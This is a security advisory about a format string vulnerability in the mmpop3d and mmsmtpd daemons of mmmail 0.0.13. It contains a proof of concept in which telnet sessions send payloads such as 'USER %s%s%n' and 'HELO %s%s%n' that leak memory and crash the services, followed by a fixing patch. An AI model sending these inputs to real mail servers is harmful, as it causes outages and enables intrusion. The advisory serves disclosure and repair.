COMMAND

	mmmail POP3-SMTP daemon format string vulnerability

SYSTEMS AFFECTED

	 mmmail <= 0.0.13 (mmpop3d & mmsmtpd)

	

	

PROBLEM

	Guillaume  Pelat  [  http://www.intexxia.com]   in   INTEXXIA   security
	advisory #1054-040602 found following:
	

	\"mmmail provides SMTP and POP3 daemons using MySQL, running as  a  non-root
	user. It also supports bandwidth shaping. Relaying is not supported,  although
	it has been designed to handle many users on many virtual hosts.  It  is
	fast and secure, uses  threads,  and  has  been  written  entirely  from
	scratch and does not rely on mbox or Maildir formats.\"
	

	mmmail includes 2  daemons,  mmpop3d  and  mmsmtpd.  Both  are  vulnerable
	to a remotely exploitable format string issue.
	

	

	There is a format string  vulnerability  in  the  \'mmsyslog()\'  function
	of the \'mmpop3d\' and \'mmsmtpd\' programs.  This  function  acts  like
	\'vsyslog()\' if \'__GLIBC__\' is defined. It  calls  the  \'syslog(3)\'
	function with a format string that can be defined by a remote  user.  It
	is not necessary to authenticate to exploit this vulnerability.
	

	Successful exploitation of this flaw can allow a remote user  to  obtain
	a local account on the target machine.
	

	

	

	 PROOF OF CONCEPT

	 ================

	

	 mmpop3d

	 --------

	

	

	test:~$ telnet test.lab.intexxia.com 110

	Trying x.x.x.x...

	Connected to test.lab.intexxia.com.

	Escape character is \'^]\'.

	+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready

	USER %p%p

	- -ERR Invalid username

	

	

	In the log file :
	

	mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

	

	test:~$ telnet test.lab.intexxia.com 110

	Trying x.x.x.x...

	Connected to test.lab.intexxia.com.

	Escape character is \'^]\'.

	+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready

	USER %s%s%n

	Connection closed by foreign host.

	

	test:~$ telnet test.lab.intexxia.com 110

	Trying x.x.x.x...

	telnet: Unable to connect to remote host: Connection refused

	

	

	

	 mmsmtpd

	 -------

	

	

	test:~$ telnet test.lab.intexxia.com 25

	Trying x.x.x.x...

	Connected to test.lab.intexxia.com.

	Escape character is \'^]\'.

	220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready

	HELO %p%p

	501 Invalid hostname

	

	

	In the log file :
	

	mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

	

	test:~$ telnet test.lab.intexxia.com 25

	Trying x.x.x.x...

	Connected to test.lab.intexxia.com.

	Escape character is \'^]\'.

	220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready

	HELO %s%s%n

	Connection closed by foreign host.

	

	test:~$ telnet test.lab.intexxia.com 25

	Trying x.x.x.x...

	telnet: Unable to connect to remote host: Connection refused

	

SOLUTION

	The following patch corrects this issue :
	

	

	diff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c

	- --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002

	+++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun  4 12:37:19 2002

	@@ -70,7 +70,7 @@

	  va_start(lst, fmt);

	  vsnprintf(buf, 1023, fmt, lst);

	  va_end(lst);

	- - syslog(LOG_NOTICE, buf);

	+ syslog(LOG_NOTICE, \"%s\", buf);

	     }

	 }

	

	

	A new version including this patch is available at the following URL :
	

	http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz